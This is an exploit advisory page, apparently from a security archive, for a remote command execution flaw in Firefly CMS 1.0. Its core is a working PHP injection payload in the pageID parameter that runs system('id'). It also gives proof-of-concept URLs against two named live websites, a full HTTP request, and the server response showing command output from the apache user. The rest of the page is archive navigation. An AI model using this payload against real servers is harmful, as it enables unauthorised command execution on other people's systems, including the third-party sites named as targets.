exploit the possibilities

Firefly CMS 1.0 Remote Command Execution

Firefly CMS 1.0 Remote Command Execution
Posted May 13, 2019
Authored by Felipe Andrian Peixoto

Firefly CMS version 1.0 suffers from a remote command execution vulnerability.

tags | exploit, remote
MD5 | d421edeaf40b8a45026e4e15e147ce05

Firefly CMS 1.0 Remote Command Execution

Change Mirror Download
[+] Remote Comand Execution on Firefly CMS v. 1.0

[+] Date: 11/05/2019

[+] CWE number: CWE-78

[+] Risk: High

[+] Author: Felipe Andrian Peixoto

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Linux

[+] Vendor Homepage: https://fireflydigital.com/

[+] Vulnerable File: site.php

[+] Version : 1.0

[+] Exploit: http://host/patch/site.php?pageID={${system(%27id%27)}}

[+] PoC: https://www.volalaw.com/site.php?pageID={${system(%27id%27)}}
https://www.beltsforanything.com/site.php?pageID={${system(%27id%27)}}

[+] Example Request:

GET /site.php?pageID={${system(%27id%27)}} HTTP/1.1
Host: www.volalaw.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html;">
<link rel="stylesheet" href="bug.css" type="text/css">
</head>
<body text="#000000" bgcolor="#F6EEE1" link="#008080" vlink="#808080" alink="#000080" background="templates/images/bkgd.jpg">

<table border="0" width="100%" cellspacing="0" cellpadding="0" align="center">
<tr valign="top">
<td class="body_links">uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
</td>
</tr>
</table>
</body>
</html>

[+] More About : http://cwe.mitre.org/data/definitions/78.html
Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    7 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close